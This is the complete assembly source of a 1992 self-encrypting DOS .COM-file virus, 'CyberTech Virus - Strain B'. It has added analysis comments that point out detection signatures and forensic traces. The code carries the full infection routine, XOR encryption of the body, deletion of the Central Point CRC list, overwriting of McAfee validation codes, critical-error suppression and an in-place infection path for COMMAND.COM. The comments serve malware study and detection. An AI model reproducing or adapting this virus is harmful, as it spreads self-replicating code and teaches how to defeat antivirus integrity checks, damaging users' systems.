
;
;  CyberTech Virus - Strain B                           John Tardy (C) 1992
;
;  Written in A86 V3.22
;
;  Description : This is a Non-Resident Self-Encrypting .COM file infector
;                which infects COM files in the current directory. It will
;                remove CHKLIST.CPS from the current directory after it has
;                infected a program. CHKLIST.CPS is a file which is used by
;                VDEFEND of PCSHELL and Central Point AntiVirus. When a
;                validation code has been added by SCAN of McAfee, it will
;                overwrite the code, so the file is no longer CRC protected.
;                After 1993, the virus activates. It then displays a message
;                that your system has been infected. The virus will remove
;                itself from the infected file and completely restore it. If
;                a validation code was added, it is lost, but the file is not
;                corrupted and will function normally. Even when the file is
;                compressed afterwards by an executable file compressor, it is
;                uncompressed. Before 1994, the virus sometimes displays its
;                copyright. This happens when the random encryption counter
;                is 0. It will then generate a new one, so there is no visible
;                text in the virus. It also checks if there is enough disk
;                space available and installs a critical error handler.
;
;
; ANALYSIS: on-disk layout of an infected .COM. Offset 0 is the E9 jump
; (its rel16 is patched per host via CallPtr in the data area), offset 3
; is the one-byte marker '*' (2Ah) that Found tests to skip files that
; are already infected. The byte pattern E9 ?? ?? 2A at the start of a
; .COM is therefore this strain's own "already infected" test and a
; cheap static pre-filter for a scanner or integrity checker.
;
            Org 0h                              ; Generate .BIN file

Start:      Jmp MainVir                         ; Jump to decryptor code at EOF

            Db '*'                              ; Virus signature (very short)
  30.  
  31. ;
  32. ; Decryptor procedure
  33. ;
  34.  
;
; ANALYSIS: the Call/Pop pair yields BP = load offset of the virus image,
; so every data reference below is written as label[BP]. Only this stub
; (DecrLen bytes, MainVir up to and including the Loop) is stored in clear
; in an infected file; everything from Crypt onward is XORed with a single
; key byte. NoZero patches that key into the immediate of "Xor Al,0"
; (Decrypt+2), so the stub is a fixed-length scan string with exactly one
; wildcard byte, and any sample is recovered by reading that byte (or at
; worst trying all 256 values).
;
MainVir:    Call On1                            ; Push offset on stack

On1:        Pop BP                              ; Calculate virus offset
            Sub BP,Offset MainVir+3             ;

            Push Ax                             ; Save possible error code
                                                ; (presumably AX as delivered
                                                ; by DOS at entry; popped again
                                                ; at Ready before the host runs)

            Lea Si,Crypt[BP]                    ; Decrypt the virus with a
            Mov Di,Si                           ; very simple exclusive or
            Mov Cx,CryptLen                     ; function (in place, SI = DI).
Decrypt:    Lodsb                               ;
            Xor Al,0                            ; key byte at Decrypt+2 is
            Stosb                               ; patched by NoZero
            Loop Decrypt                        ;

DecrLen     Equ $-MainVir                       ; Length of the decryptor
  51.  
  52. ;
  53. ; Main initialization procedure
  54. ;
  55.  
;
; ANALYSIS: the host's first four bytes (captured into OrgPrg at infection
; time and carried, encrypted, inside the virus body) are copied back over
; CS:100h, so the in-memory host image is intact before Ready transfers
; control there. The INT 24h vector is then replaced by writing the
; interrupt table at 0000:0090h directly rather than through the DOS
; set-vector service; a behaviour monitor that only hooks that service
; will not observe it. NewInt24 answers every critical error with AL=3
; (fail), so a write-protected or faulty disk never raises the
; Abort/Retry prompt while a file is being modified.
;
Crypt:      Mov Ax,Cs:OrgPrg[BP]                ; Store begin of host at
            Mov Bx,Cs:OrgPrg[BP]+2              ; cs:100h (begin of com)
            Mov Cs:Start+100h,Ax                ;
            Mov Cs:Start[2]+100h,Bx             ;

            Xor Ax,Ax                           ; Get original interrupt 24
            Push Ax                             ; (critical error handler)
            Pop Ds                              ;
            Mov Bx,Ds:[4*24h]                   ;
            Mov Es,Ds:[4*24h]+4                 ; (note: reads 0000:0094h,
                                                ; see the note at Ready)

            Mov Word Ptr Cs:OldInt24[Bp],Bx     ; And store it on a save place
            Mov Word Ptr Cs:OldInt24+2[Bp],Es   ;

            Lea Bx,NewInt24[Bp]                 ; Install own critical error
            Push Cs                             ; handler to avoid messages
            Pop Es                              ; when a disk is write
            Mov Word Ptr Ds:[4*24h],Bx          ; protected and such things
            Mov Word Ptr Ds:[4*24h]+2,Es        ;
            Push Cs                             ; (ES stays = CS from here on;
            Pop Ds                              ; Rep Movsb/Stosb rely on it)

            Mov Ah,30h                          ; Check if DOS version is
            Int 21h                             ; 3.0 or above for correct
            Cmp Al,3                            ; interrupt use
            Jae TestDate                        ; (below 3.0 nothing is done,
            Jmp Ready                           ;  straight to the host)

TestDate:   Mov Ah,2ah                          ; Check if 1993 is past time
            Int 21h                             ; already (CX = year)
            Cmp Cx,1994                         ;
            Jae Clean                           ; - 1994 or more
            Jmp NoClean                         ; - Not 1994 or more
  89.  
  90. ;
  91. ; Main Cleanup procedure
  92. ;
  93.  
;
; ANALYSIS (year >= 1994 path): the virus locates the name of its own host,
; rewrites the host from the in-memory image and exits. The DTA is moved
; to CS:FD00h and the copied name is kept at CS:FD80h, both near the top
; of the 64K COM segment.
;
Clean:      Mov Ah,1ah                          ; Move DTA to a safe place
            Mov Dx,0fd00h                       ;
            Int 21h                             ;

            Mov Ax,Cs:[2ch]                     ; Find the name of the
            Mov Ds,Ax                           ; program that is now
            Mov Si,0                            ; executed (me must search in
            Mov Cx,4000h                        ; the DOS environment for
Seeker:     Lodsb                               ; safe tracking of the name
            Cmp Al,1                            ; presumably the 0001h word that
            Je On3                              ; precedes the program path in
            Loop Seeker                         ; a DOS 3+ environment block

On3:        Inc Si                              ; Transfer the found name
            Push Cs                             ; to a safe address in memory
            Pop Es                              ;
            Mov Di,0fd80h                       ;
            Mov Cx,80h                          ;
Trans:      Lodsb                               ;
            Cmp Al,0                            ;
            Je Verder                           ;
            Stosb                               ;
            Loop Trans                          ;

Verder:     Stosb                               ; store the terminating NUL
            Sub Di,12                           ; DI -> last 12 chars of the name
            Push Cs
            Pop Ds
            Mov Ax,[Di][0]                      ; a host named COMMAN?.COM is
            Cmp Ax,'OC'                         ; never restored (same test
            Jne Normal                          ; as in Infect)
            Mov Ax,[Di][2]
            Cmp Ax,'MM'
            Jne Normal
            Mov Ax,[Di][4]
            Cmp Ax,'NA'
            Jne Normal
            Jmp Ready

Normal:     Push Cs                             ; Read file attributes and
            Pop Ds                              ; check if an error has
            Mov Ax,4300h                        ; occured
            Mov Dx,0fd80h                       ;
            Int 21h                             ;
            Jnc DeInfect                        ; - No error, DeInfect
            Jmp Ready                           ; - Error, Ready

DeInfect:   Push Cx                             ; Store old file attributes

            Mov Ax,4301h                        ; Clear file attributes
            Xor Cx,Cx                           ; (for read only etc.)
            Int 21h                             ;

            Mov Ax,3d02h                        ; Open the file
            Int 21h                             ;

            Mov Bx,Ax                           ; Read file date/time stamp
            Mov Ax,5700h                        ; and store it on the stack
            Int 21h                             ; for later use
            Push Cx                             ;
            Push Dx                             ;

            Mov Ah,3eh                          ; Close file
            Int 21h                             ;

            Mov Dx,0fd80h                       ; Create a new file with the
            Xor Cx,Cx                           ; same name (3Ch truncates the
            Mov Ah,3ch                          ; existing file to length 0)
            Int 21h                             ;

            Mov Bx,Ax                           ; store file handle in BX

            Mov Dx,100h                         ; program to file (the original
            Mov Cx,Bp                           ; file is now back again)
            Sub Cx,0fch                         ; NOTE(review): BP is 100h + host
                                                ; length (see On1), so this writes
                                                ; host length + 4 bytes; the E9
                                                ; jump and '*' of the virus image
                                                ; appear to remain as a 4-byte
                                                ; tail of the restored file -
                                                ; confirm on a sample; if so it
                                                ; is a forensic trace of
                                                ; self-removal.

            Mov Ah,40h                          ; write memory image of host
            Int 21h                             ;

            Pop Dx                              ; restore file date/time
            Pop Cx                              ; stamp (the mtime is not an
            Mov Ax,5701h                        ; indicator for this strain)
            Int 21h                             ;

            Mov Ah,3eh                          ; close file
            Int 21h                             ;

            Pop Cx                              ; restore file attributes
            Mov Ax,4301h                        ;
            Mov Dx,0fd80h                       ;
            Int 21h                             ;

            Push Cs                             ; Show message that the
            Pop Ds                              ; system has been infected
            Mov Ah,9                            ; and shutdown virus
            Lea Dx,Removed[Bp]                  ; (Removed has no '$', so Msg
            Int 21h                             ; is printed right after it)
            Jmp Ready                           ;
  192.  
  193. ;
  194. ; Main viral part
  195. ;
  196.  
;
; ANALYSIS (year < 1994 path): infects at most one *.COM in the current
; directory per run - after a successful write the code calls Close and
; falls into Ready, it never returns to Search. The read-only attribute
; is cleared before opening and the date/time stamp is restored in Close,
; so neither protects a file nor marks an infected one; growth of the
; file by VirLen bytes is the usable indicator, except for the COMMAND
; and validation-code cases handled from Infect onward. The DTA is at
; CS:FD00h, so the found file name is at CS:FD1Eh (DTA+1Eh).
;
NoClean:    Mov Ah,1ah                          ; Store DTA at safe place
            Mov Dx,0fd00h                       ;
            Int 21h                             ;

            Mov Ah,4eh                          ; FindFirstFile Function

Search:     Lea Dx,FileSpec[BP]                 ; Search for filespec given
            Xor Cx,Cx                           ; in FileSpec adress
            Int 21h                             ;
            Jnc Found                           ; Found - Found
            Jmp Ready                           ; Not Found - Ready

Found:      Mov Ax,4300h                        ; Get file attributes and
            Mov Dx,0fd1eh                       ; store them on the stack
            Int 21h                             ;
            Push Cx                             ;

            Mov Ax,4301h                        ; clear file attributes
            Xor Cx,Cx                           ;
            Int 21h                             ;

            Mov Ax,3d02h                        ; open file with read/write
            Int 21h                             ; access

            Mov Bx,5700h                        ; save file date/time stamp
            Xchg Ax,Bx                          ; on the stack
            Int 21h                             ;
            Push Cx                             ;
            Push Dx                             ;

            Mov Ah,3fh                          ; read the first 4 bytes of
            Lea Dx,OrgPrg[BP]                   ; the program onto OrgPrg
            Mov Cx,4                            ; (carried inside the body so
            Int 21h                             ; Crypt can restore them)

            Mov Ax,Cs:[OrgPrg][BP]              ; Check if renamed exe-file
            Cmp Ax,'ZM'                         ;
            Je ExeFile                          ;

            Cmp Ax,'MZ'                         ; Check if renamed weird exe-
            Je ExeFile                          ; file

            Mov Ah,Cs:[OrgPrg+3][BP]            ; Check if already infected
            Cmp Ah,'*'                          ; (marker byte at offset 3)
            Jne Infect                          ;

ExeFile:    Call Close                          ; If one of the checks is yes,
            Mov Ah,4fh                          ; close file and search next
            Jmp Search                          ; file
  246.  
;
; FSeek: INT 21h/42h with CX:DX = 0. The caller sets AX (4200h = seek from
; start, 4202h = seek from end); the resulting position comes back in
; DX:AX, which the callers use as the file size after 4202h.
;
FSeek:      Xor Cx,Cx                           ; subroutine to jump to end
            Xor Dx,Dx                           ; or begin of file
            Int 21h                             ;
            Ret                                 ;
  251.  
;
; ANALYSIS (COMMAN?.COM host): instead of appending, the last VirS
; (2*VirLen) bytes of the file are read into Buffer and scanned for a run
; of VirLen zero bytes. If one exists the file pointer is left at its
; start and CalcVirus/NoZero later write the virus over it, so the file
; size does NOT change. Detection for this case has to compare content
; (hash) rather than size. If no such run exists, control falls back to
; the normal append path at NoCommand.
;
Infect:     Mov Ax,0fd1e[0]                     ; check if the file is
            Cmp Ax,'OC'                         ; COMMAN?.COM (usually result
            Jne NoCommand                       ; if COMMAND.COM)
            Mov Ax,0fd1e[2]                     ;
            Cmp Ax,'MM'                         ;
            Jne NoCommand                       ;
            Mov Ax,0fd1e[4]                     ;
            Cmp Ax,'NA'                         ;
            Jne NoCommand                       ;

            Mov Ax,4202h                        ; Jump to EOF
            Call Fseek                          ;

            Cmp Ax,0f000h                       ; Check if file too large
            Jae ExeFile

            Cmp Ax,VirS                         ; Check if file to short
            jbe ExeFile

            Sub     Ax,VirS                     ; AX = EOF - VirS
            Xchg    Cx,Dx                       ; CX = high word of the size
            Mov     Dx,4200h
            Xchg    Dx,Ax                       ; AX = 4200h, DX = EOF - VirS
            Mov     EOFminVir[BP],Dx            ; file offset Buffer maps to
            Int     21h
            Mov     Ah,3fh                      ; read the tail into Buffer
            Mov     Dx,Offset Buffer
            Mov     Cx,VirS
            Int     21h
            Cld
            Mov     Si,Offset Buffer
            Mov     Cx,VirLen
On5:
            Push    Cx
On6:        Lodsb                               ; count consecutive zero bytes
            Cmp     Al,0
            Jne     On4
            Loop    On6
On4:        Cmp     Cx,0                        ; CX = 0 -> VirLen zeros found
            Je      Found0

            Pop     Cx
            Cmp     Si,SeekLen                  ; SeekLen = end of Buffer
            Jb      On5
            Jmp     NoCommand                   ; no room: append instead

Found0:     Pop     Cx
            Sub     Si,Offset Buffer            ; SI = start of the zero run
            Sub     Si,Cx                       ; relative to Buffer
            Xor     Cx,Cx
            Mov     Dx,EOFminVir[BP]
            Add     Dx,Si                       ; file offset of the zero run

            Mov     Ax,4200h
            Int     21h
            Jmp     CalcVirus

EOFminVir   Dw 0                                ; data word inside the code
  310.  
;
; ANALYSIS (ordinary .COM): the last 52 bytes are read and tested for the
; word pair 0FDF0h,0AAC5h at offset 0 or 42 of that tail, which the author
; identifies as the McAfee SCAN /AG and /AV validation blocks. If present,
; the virus body is written starting at that block instead of at EOF: the
; integrity data stored inside the protected file is what gets overwritten
; and the file grows by less than VirLen. Integrity data kept outside the
; protected file is not affected by this.
;
NoCommand:  Mov Ax,4202h                        ; jump to EOF
            Call FSeek                          ;

            Cmp Ax,0f000h                       ; Check if file too large
            Jb NoExe1                           ; if yes, goto exefile
            Jmp ExeFile                         ;

NoExe1:     Cmp Ax,10                           ; Check if file too short
            Ja NoExe2                           ; if yes, goto exefile
            Jmp ExeFile                         ;


NoExe2:     Mov Cx,Dx                           ; calculate pointer to offset
            Mov Dx,Ax                           ; EOF-52 (for McAfee validation
            Sub Dx,52                           ; codes)

            Mov Si,Cx                           ; move file pointer to the
            Mov Di,Dx                           ; calculated address
            Mov Ax,4200h                        ; (SI:DI keep a copy of it)
            Int 21h                             ;

            Mov Ah,3fh                          ; read the last 52 bytes
            Mov Dx,0fb00h                       ; of the file
            Mov Cx,52                           ;
            Int 21h                             ;

            Cmp Ds:0Fb00h,0fdf0h                ; check if protected with the
            Jne Check2                          ; AG option
            Cmp Ds:0fb02h,0aac5h                ;
            Jne Check2                          ;

            Mov Ax,4200h                        ; yes - let virus overwrite
            Mov Cx,Si                           ; the code with itself, so
            Mov Dx,Di                           ; the file has no validation
            Int 21h                             ; code
            Jmp CalcVirus                       ;

Check2:     Cmp Ds:0Fb00h+42,0fdf0h             ; check if protected with the
            Jne Eof                             ; AV option
            Cmp Ds:0Fb02h+42,0aac5h             ;
            Jne Eof                             ;

            Mov Ax,4200h                        ; yes - let virus overwrite
            Mov Cx,Si                           ; the code with itself, so
            Mov Dx,Di                           ; the file has no validation
            Add Dx,42                           ; code
            Int 21h                             ;
            Jmp CalcVirus                       ;

Eof:        Mov Ax,4202h                        ; not AG or AV - jump to
            Call Fseek                          ; EOF

CalcVirus:  Sub Ax,3                            ; calculate the jump for the
            Mov Cs:CallPtr[BP]+1,Ax             ; virus start (rel16 of the E9
                                                ; = write position - 3)

GetCrypt:   Mov Ah,2ch                          ; get 100s seconds for the
            Int 21h                             ; encryption value.
            Cmp Dl,0                            ; if not zero, goto NoZero
            Jne NoZero                          ; (a zero key would leave the
                                                ; body and its strings in
                                                ; clear on disk)

            Mov Ah,9                            ; If zero, display copyright
            Lea Dx,Msg[Bp]                      ; message and generate again
            Int 21h                             ; a number (visible side effect,
            Jmp GetCrypt                        ; roughly 1 run in 100)

NoZero:     Mov Cs:Decrypt+2[BP],Dl             ; Store key into decryptor
                                                ; (the imm8 of "Xor Al,0")

            Lea Si,MainVir[BP]                  ; Move changed decryptor to
            Mov Di,0fb00h                       ; a safe place in memory
            Mov Cx,DecrLen                      ; (ES = CS since the INT 24h
            Rep Movsb                           ; setup in Crypt)

            Lea Si,Crypt[BP]                    ; Encrypt the virus and merge
            Mov Cx,CryptLen                     ; it to the changed decryptor
Encrypt:    Lodsb                               ; code
            Xor Al,Dl                           ;
            Stosb                               ;
            Loop Encrypt                        ;

            Mov Ah,40h                          ; append virus at EOF or over
            Lea Dx,0fb00h                       ; the validation code of
            Mov Cx,VirLen                       ; McAfee
            Int 21h                             ;

            Mov Ax,4200h                        ; Jump to BOF
            Call FSeek                          ;

            Mov Ah,40h                          ; Write Jump at BOF
            Lea Dx,CallPtr[BP]                  ; (3 bytes E9 rel16 followed by
            Mov Cx,4                            ; the '*' of FileSpec = marker)
            Int 21h                             ;

            Call Close                          ; Jump to Close routine
                                                ; (returns here, then falls
                                                ; into Ready: one file per run)
  404.  
;
; ANALYSIS: common exit. Restores the DTA and the INT 24h vector, pops the
; AX saved in MainVir and transfers to CS:100h, where Crypt put the host's
; original bytes back, so the host runs normally.
; NOTE(review): the vector written back appears to be wrong - Crypt saved
; the segment from 0000:0094h (the INT 25h offset slot) rather than
; 0000:0092h, and the two words are stored here in swapped order (DX, the
; saved "segment", into the offset slot and AX, the saved offset, into the
; segment slot). If so, INT 24h points at garbage after an infected
; program has run, a live-system indicator worth checking in an emulator.
;
Ready:      Mov Ah,1ah                          ; Restore DTA to normal
            Mov Dx,80h                          ; offset
            Int 21h                             ;

            Mov Ax,Cs:OldInt24[Bp]              ; remove critical error
            Mov Dx,Cs:OldInt24+2[Bp]            ; handler and store the
            Xor Bx,Bx                           ; original handler at the
            Push Bx                             ; interrupt table
            Pop Ds                              ;
            Mov Ds:[4*24h],Dx                   ; (OldInt24+2 -> offset slot)
            Mov Ds:[4*24h]+2,Ax                 ; (OldInt24 -> segment slot)
            Push Cs                             ;
            Pop Ds                              ;

            Pop Ax                              ; restore possible error code

            Mov Bx,100h                         ; nice way to jump to the
            Push Cs                             ; begin of the original host
            Push Bx                             ; code
            Retf                                ;
  425.  
;
; Close: entered with the return address on top of the stack and, below
; it, the three words Found pushed (time, date, attributes). SI parks the
; return address so those can be popped, then it is pushed back for Ret.
; Note this runs for every opened file, infected or not (ExeFile calls it
; as well), so chklist.cps is removed from the current directory whenever
; any .COM there was examined. Its absence is an on-disk artifact, and per
; the header it is the CRC list CPAV/VDEFEND rely on.
;
Close:      Pop Si                              ; why??? -> return address
                                                ; parked in SI

            Pop Dx                              ; restore file date/time
            Pop Cx                              ; stamp
            Mov Ax,5701h                        ;
            Int 21h                             ;

            Mov Ah,3eh                          ; close file
            Int 21h                             ;

            Mov Ax,4301h                        ; restore file attributes
            Pop Cx                              ;
            Mov Dx,0fd1eh                       ;
            Int 21h                             ;

            Mov Ah,41h                          ; delete CHKLIST.CPS (the
            Lea Dx,CpsName[BP]                  ; Central Point CRC list)
            Int 21h                             ;

            Push Si                             ; why??? -> return address back
            Ret
  447.  
  448. ;
  449. ; Message when we are in 1994
  450. ;
  451.  
;
; ANALYSIS: both strings below lie inside the encrypted region
; (Crypt..CryptLen) and exist in clear only in memory after the decryptor
; has run, so a plain string search of an infected file will not find
; them. Removed carries no '$' terminator: INT 21h/09h at DeInfect prints
; it and then Msg (which ends in '$') back to back.
;
;Removed     Db 13,10,'Virus removed : ',13,10

Removed     Db 13,10,'The previous year you have been infected by a virus'
            Db 13,10,'without knowing or removing it. To be gentle to you'
            Db 13,10,'I decided to remove myself from your system. I suggest'
            Db 13,10,'you better buy ViruScan of McAfee to ensure yourself'
            Db 13,10,'complete security of your precious data. Next time you'
            Db 13,10,'could be infected with a malevolent virus.'
            Db 13,10,10,'May I say goodbye to you for now....',13,10

;
; Message when encryption byte = 0 or when we are living in 1994
;

Msg         Db 13,10,'CyberTech Virus - Strain B'
            Db 13,10,'(C) 1992 John Tardy of Trident'
            Db 13,10,'$'
  469.  
  470. ;
  471. ; New critical error handler
  472. ;
  473.  
;
; ANALYSIS: AL=3 is the "fail" answer to the DOS critical-error
; dispatcher, so any disk error during infection is reported back to the
; virus as a failed call and no Abort/Retry/Ignore prompt reaches the user.
;
NewInt24:   Mov Al,3                            ; supress any critical error
            Iret                                ; messages

CpsName     Db 'chklist.cps',0                  ; name for CP CRC-list
                                                ; (no path: current dir only)

OldInt24    Dd 0                                ; storage place for old int 24

CallPtr     Db 0e9h,0,0                         ; jump to place at BOF
                                                ; (rel16 filled in by CalcVirus;
                                                ; the 4-byte BOF write takes the
                                                ; '*' of FileSpec as byte 3)

FileSpec    Db '*.COM',0                        ; filespec and infection marker
                                                ; (no path: current dir only)

OrgPrg:     Int 20h                             ; original program
            Db 'JT'                             ; (the host's first 4 bytes are
                                                ; read over this in Found; the
                                                ; Int 20h/'JT' is the carrier's)

CryptLen    Equ $-Crypt                         ; encrypted part length

VirLen      Equ $-MainVir                       ; total virus length

Buffer      Equ 0f040h                          ; buffer offset
VirS        Equ VirLen*2                        ; tail window scanned in Infect

SeekLen     Equ Buffer+Virs                     ; end of that window
  496.  
  497. ;  ─────────────────────────────────────────────────────────────────────────
  498. ;  ────────────────────> and Remember Don't Forget to Call <────────────────
  499. ;  ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
  500. ;  ─────────────────────────────────────────────────────────────────────────